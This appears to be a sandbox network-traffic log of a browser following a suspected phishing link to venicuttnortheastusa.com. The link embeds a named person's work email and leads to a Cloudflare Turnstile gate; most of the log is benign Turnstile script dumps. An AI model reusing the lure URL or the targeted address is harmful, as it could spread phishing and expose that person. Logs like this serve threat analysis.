2024-06-21 15:58:56 UTC	466	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=87041 Date: Fri, 21 Jun 2024 15:58:56 GMT Connection: close X-CID: 2

Timestamp	Bytes transferred	Direction	Data
2024-06-21 15:58:56 UTC	734	OUT	GET /?lbkwmykb&qrc=lawrence.france@cabinetworksgroup.com HTTP/1.1 Host: venicuttnortheastusa.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: http://kenfong.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-21 15:58:57 UTC	464	IN	HTTP/1.1 302 Found Set-Cookie: qPdM=NmXp2xNoncrA; path=/; samesite=none; secure; httponly Set-Cookie: qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8; path=/; samesite=none; secure; httponly location: /?lbkwmykb=446d7ae8e2b0026c09e952c1046f26eb20f17c5c86fdb89bf6a6962aa75a09f904517ec41333b61ba7f0802aa8928dcdb1650ecd8ee69f3c108083478cb5684c&qrc=lawrence.france%40cabinetworksgroup.com Date: Fri, 21 Jun 2024 15:59:06 GMT Connection: close Transfer-Encoding: chunked
2024-06-21 15:58:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-06-21 15:58:57 UTC	930	OUT	GET /?lbkwmykb=446d7ae8e2b0026c09e952c1046f26eb20f17c5c86fdb89bf6a6962aa75a09f904517ec41333b61ba7f0802aa8928dcdb1650ecd8ee69f3c108083478cb5684c&qrc=lawrence.france%40cabinetworksgroup.com HTTP/1.1 Host: venicuttnortheastusa.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: http://kenfong.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: qPdM=NmXp2xNoncrA; qPdM.sig=PdFKt5Q0dibZLyOxyyMieCf2SU8
2024-06-21 15:58:57 UTC	142	IN	HTTP/1.1 200 OK Content-Type: text/html;charset=UTF-8 Date: Fri, 21 Jun 2024 15:59:06 GMT Connection: close Transfer-Encoding: chunked
2024-06-21 15:58:57 UTC	3271	IN	Data Raw: 63 62 62 0d 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 2d 55 53 3e 3c 68 65 61 64 3e 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75 72 6e 73 74 69 6c 65 2f 76 30 2f 61 70 69 2e 6a 73 3f 6f 6e 6c 6f 61 64 3d 6f 6e 6c 6f 61 64 54 75 72 6e 73 74 69 6c 65 43 61 6c 6c 62 61 63 6b 22 3e 0a 3c 2f 73 63 72 69 70 74 3e 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d Data Ascii: cbb<!doctype html><html lang=en-US><head> <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script> <title>Just a moment...</title> <meta content="width=device-width,initial-scale=1" name=

Timestamp	Bytes transferred	Direction	Data
2024-06-21 15:58:57 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-06-21 15:58:57 UTC	534	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y= Cache-Control: public, max-age=87012 Date: Fri, 21 Jun 2024 15:58:57 GMT Content-Length: 55 Connection: close X-CID: 2
2024-06-21 15:58:57 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Timestamp	Bytes transferred	Direction	Data
2024-06-21 15:58:58 UTC	583	OUT	GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://venicuttnortheastusa.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-21 15:58:58 UTC	336	IN	HTTP/1.1 302 Found Date: Fri, 21 Jun 2024 15:58:58 GMT Content-Length: 0 Connection: close access-control-allow-origin: * cache-control: max-age=300, public cross-origin-resource-policy: cross-origin location: /turnstile/v0/b/c7e29c8c8b6e/api.js Server: cloudflare CF-RAY: 897533febbd25e7d-EWR alt-svc: h3=":443"; ma=86400

Timestamp	Bytes transferred	Direction	Data
2024-06-21 15:58:59 UTC	567	OUT	GET /turnstile/v0/b/c7e29c8c8b6e/api.js HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://venicuttnortheastusa.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-21 15:58:59 UTC	408	IN	HTTP/1.1 200 OK Date: Fri, 21 Jun 2024 15:58:59 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 42646 Connection: close accept-ranges: bytes last-modified: Wed, 19 Jun 2024 17:35:52 GMT cache-control: max-age=31536000 access-control-allow-origin: * cross-origin-resource-policy: cross-origin Server: cloudflare CF-RAY: 89753403ae0f7cf4-EWR alt-svc: h3=":443"; ma=86400
2024-06-21 15:58:59 UTC	1369	IN	Data Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 45 74 28 65 2c 61 2c 72 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 62 3d 65 5b 75 5d 28 67 29 2c 5f 3d 62 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 6c 29 7b 72 28 6c 29 3b 72 65 74 75 72 6e 7d 62 2e 64 6f 6e 65 3f 61 28 5f 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 5f 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 77 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2c 72 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 61 2c 72 29 3b 66 75 6e 63 74 Data Ascii: "use strict";(function(){function Et(e,a,r,o,c,u,g){try{var b=e[u](g),_=b.value}catch(l){r(l);return}b.done?a(_):Promise.resolve(_).then(o,c)}function wt(e){return function(){var a=this,r=arguments;return new Promise(function(o,c){var u=e.apply(a,r);funct
2024-06-21 15:58:59 UTC	1369	IN	Data Raw: 74 28 65 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 49 74 28 65 2c 61 29 7b 76 61 72 20 72 3d 65 3d 3d 6e 75 6c 6c 3f 6e 75 6c 6c 3a 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 7c 7c 65 5b 22 40 40 69 74 65 72 61 74 6f 72 22 5d 3b 69 66 28 72 21 3d 6e 75 6c 6c 29 7b 76 61 72 20 6f 3d 5b 5d 2c 63 3d 21 30 2c 75 3d 21 31 2c 67 2c 62 3b 74 72 79 7b 66 6f 72 28 72 3d 72 2e 63 61 6c 6c 28 65 29 3b 21 28 63 3d 28 67 3d 72 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 26 26 28 6f 2e 70 75 73 68 28 67 2e 76 61 6c 75 65 29 2c 21 28 61 26 26 6f 2e 6c 65 6e 67 74 68 3d 3d 3d 61 29 29 3b 63 3d 21 30 29 Data Ascii: t(e){if(Array.isArray(e))return e}function It(e,a){var r=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]\|\|e["@@iterator"];if(r!=null){var o=[],c=!0,u=!1,g,b;try{for(r=r.call(e);!(c=(g=r.next()).done)&&(o.push(g.value),!(a&&o.length===a));c=!0)
2024-06-21 15:58:59 UTC	1369	IN	Data Raw: 5d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 5f 28 6c 29 7b 69 66 28 6f 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 47 65 6e 65 72 61 74 6f 72 20 69 73 20 61 6c 72 65 61 64 79 20 65 78 65 63 75 74 69 6e 67 2e 22 29 3b 66 6f 72 28 3b 67 26 26 28 67 3d 30 2c 6c 5b 30 5d 26 26 28 72 3d 30 29 29 2c 72 3b 29 74 72 79 7b 69 66 28 6f 3d 31 2c 63 26 26 28 75 3d 6c 5b 30 5d 26 32 3f 63 2e 72 65 74 75 72 6e 3a 6c 5b 30 5d 3f 63 2e 74 68 72 6f 77 7c 7c 28 28 75 3d 63 2e 72 65 74 75 72 6e 29 26 26 75 2e 63 61 6c 6c 28 63 29 2c 30 29 3a 63 2e 6e 65 78 74 29 26 26 21 28 75 3d 75 2e 63 61 6c 6c 28 63 2c 6c 5b 31 5d 29 29 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 75 3b 73 77 69 74 63 68 28 63 3d 30 2c 75 26 26 28 6c 3d 5b 6c 5b 30 5d 26 32 2c 75 2e 76 61 6c Data Ascii: ])}}function _(l){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,l[0]&&(r=0)),r;)try{if(o=1,c&&(u=l[0]&2?c.return:l[0]?c.throw\|\|((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,l[1])).done)return u;switch(c=0,u&&(l=[l[0]&2,u.val
2024-06-21 15:58:59 UTC	1369	IN	Data Raw: 2c 65 2e 4c 49 47 48 54 3d 22 6c 69 67 68 74 22 2c 65 2e 44 41 52 4b 3d 22 64 61 72 6b 22 7d 29 28 6b 65 7c 7c 28 6b 65 3d 7b 7d 29 29 3b 76 61 72 20 78 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 78 65 7c 7c 28 78 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 5a 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 Data Ascii: ,e.LIGHT="light",e.DARK="dark"})(ke\|\|(ke={}));var xe;(function(e){e.NEVER="never",e.AUTO="auto"})(xe\|\|(xe={}));var X;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(X\|\|(X={}));var Z;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="aut
2024-06-21 15:58:59 UTC	1369	IN	Data Raw: 3d 3d 22 61 75 74 6f 22 7c 7c 67 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 61 74 28 65 29 7b 72 65 74 75 72 6e 20 4e 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 69 74 28 65 29 7b 72 65 74 75 72 6e 20 4e 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 6b 74 3d 33 30 30 2c 4c 74 3d 31 30 3b 76 61 72 20 6a 3d 22 30 2f 30 22 3b 66 75 6e 63 74 69 6f 6e 20 6f 74 28 65 29 7b 76 61 72 20 61 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 Data Ascii: =="auto"\|\|gr.test(e)}function at(e){return N(["always","execute","interaction-only"],e)}function it(e){return N(["render","execute"],e)}var kt=300,Lt=10;var j="0/0";function ot(e){var a=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(e.params._de
2024-06-21 15:58:59 UTC	1369	IN	Data Raw: 59 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 7c 7c 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 72 65 74 75 72 6e 20 6f 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 63 2c 6f 7d 2c 59 28 65 2c 61 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 2c 61 29 7b 69 66 28 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 61 21 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 61 26 26 61 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 Data Ascii: Y=Object.setPrototypeOf\|\|function(o,c){return o.__proto__=c,o},Y(e,a)}function Bt(e,a){if(typeof a!="function"&&a!==null)throw new TypeError("Super expression must either be null or a function");e.prototype=Object.create(a&&a.prototype,{constructor:{value
2024-06-21 15:58:59 UTC	1369	IN	Data Raw: 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 59 28 63 2c 6f 29 7d 2c 50 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 58 74 28 65 2c 61 29 7b 72 65 74 75 72 6e 20 61 26 26 28 43 28 61 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 74 79 70 65 6f 66 20 61 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 3f 61 3a 4c 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 59 74 28 65 29 7b 76 61 72 20 61 3d 4d 65 28 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6f 3d 74 65 28 65 29 2c 63 3b 69 66 28 61 29 7b 76 61 72 20 75 3d 74 65 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 63 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 75 29 7d 65 6c 73 65 20 63 3d 6f 2e 61 70 70 6c 79 28 74 68 69 Data Ascii: !0,configurable:!0}}),Y(c,o)},Pe(e)}function Xt(e,a){return a&&(C(a)==="object"\|\|typeof a=="function")?a:Le(e)}function Yt(e){var a=Me();return function(){var o=te(e),c;if(a){var u=te(this).constructor;c=Reflect.construct(o,arguments,u)}else c=o.apply(thi
2024-06-21 15:58:59 UTC	1369	IN	Data Raw: 24 74 28 65 2c 61 29 7b 76 61 72 20 72 2c 6f 2c 63 2c 75 3d 75 74 28 61 2e 70 61 72 61 6d 73 2c 4b 29 2c 67 3d 22 68 2f 22 2e 63 6f 6e 63 61 74 28 22 62 22 2c 22 2f 22 29 2c 62 3d 22 22 2e 63 6f 6e 63 61 74 28 75 2c 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 22 29 2e 63 6f 6e 63 61 74 28 67 2c 22 66 65 65 64 62 61 63 6b 2d 72 65 70 6f 72 74 73 2f 22 29 2e 63 6f 6e 63 61 74 28 45 65 28 65 29 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 61 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2c 5f 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 5f 7c 7c 70 28 22 43 61 6e 6e 6f 74 20 69 6e 69 74 69 61 6c 69 7a 65 20 57 69 64 67 65 74 2c 20 45 6c 65 6d 65 6e 74 20 6e 6f 74 20 Data Ascii: $t(e,a){var r,o,c,u=ut(a.params,K),g="h/".concat("b","/"),b="".concat(u,"/cdn-cgi/challenge-platform/").concat(g,"feedback-reports/").concat(Ee(e),"/").concat(a.displayLanguage,"/"),_=document.getElementById(e);_\|\|p("Cannot initialize Widget, Element not
2024-06-21 15:58:59 UTC	1369	IN	Data Raw: 76 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 6c 6c 6f 77 22 2c 22 63 72 6f 73 73 2d 6f 72 69 67 69 6e 2d 69 73 6f 6c 61 74 65 64 3b 20 66 75 6c 6c 73 63 72 65 65 6e 22 29 2c 76 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 61 6e 64 62 6f 78 22 2c 22 61 6c 6c 6f 77 2d 73 61 6d 65 2d 6f 72 69 67 69 6e 20 61 6c 6c 6f 77 2d 73 63 72 69 70 74 73 20 61 6c 6c 6f 77 2d 70 6f 70 75 70 73 20 61 6c 6c 6f 77 2d 66 6f 72 6d 73 22 29 2c 76 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 63 72 6f 6c 6c 69 6e 67 22 2c 22 6e 6f 22 29 2c 76 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 57 69 64 74 68 3d 22 30 70 78 22 2c 76 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 25 22 2c 76 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 25 22 2c 76 2e 73 74 79 6c 65 2e Data Ascii: v.setAttribute("allow","cross-origin-isolated; fullscreen"),v.setAttribute("sandbox","allow-same-origin allow-scripts allow-popups allow-forms"),v.setAttribute("scrolling","no"),v.style.borderWidth="0px",v.style.width="100%",v.style.height="100%",v.style.
2024-06-21 15:58:59 UTC	1369	IN	Data Raw: 66 22 29 2c 64 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 66 69 6c 6c 22 2c 22 6e 6f 6e 65 22 29 2c 64 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 78 31 22 2c 22 36 22 29 2c 64 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 78 32 22 2c 22 31 38 22 29 2c 64 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 79 31 22 2c 22 35 22 29 2c 64 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 79 32 22 2c 22 31 38 22 29 2c 6e 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 64 29 2c 68 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 76 29 2c 68 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6e 29 2c 6c 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 68 29 2c 28 63 3d 5f 2e 70 61 72 65 6e 74 4e 6f 64 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 63 3d 3d 3d 76 6f 69 64 20 30 7c 7c 63 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 Data Ascii: f"),d.setAttribute("fill","none"),d.setAttribute("x1","6"),d.setAttribute("x2","18"),d.setAttribute("y1","5"),d.setAttribute("y2","18"),n.appendChild(d),h.appendChild(v),h.appendChild(n),l.appendChild(h),(c=_.parentNode)===null\|\|c===void 0\|\|c.appendChild(

Timestamp	Bytes transferred	Direction	Data
2024-06-21 15:59:00 UTC	797	OUT	GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nk4xj/0x4AAAAAAAbgcue2yZftfMkc/auto/normal HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: iframe Referer: https://venicuttnortheastusa.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-06-21 15:59:00 UTC	1362	IN	HTTP/1.1 200 OK Date: Fri, 21 Jun 2024 15:59:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 79349 Connection: close critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA referrer-policy: same-origin content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self' cross-origin-opener-policy: same-origin accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 cross-origin-embedder-policy: require-corp document-policy: js-profiling permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() origin-agent-cluster: ?1 cross-origin-resource-policy: cross-origin
2024-06-21 15:59:00 UTC	82	IN	Data Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 39 37 35 33 34 30 39 64 64 32 34 63 34 31 33 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a Data Ascii: Server: cloudflareCF-RAY: 89753409dd24c413-EWRalt-svc: h3=":443"; ma=86400
2024-06-21 15:59:00 UTC	1294	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
2024-06-21 15:59:00 UTC	1369	IN	Data Raw: 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 7d 0a 0a 62 6f 64 79 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 37 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 20 Data Ascii: 00%; height: 100%; overflow: hidden;}body { margin: 0; background-color: 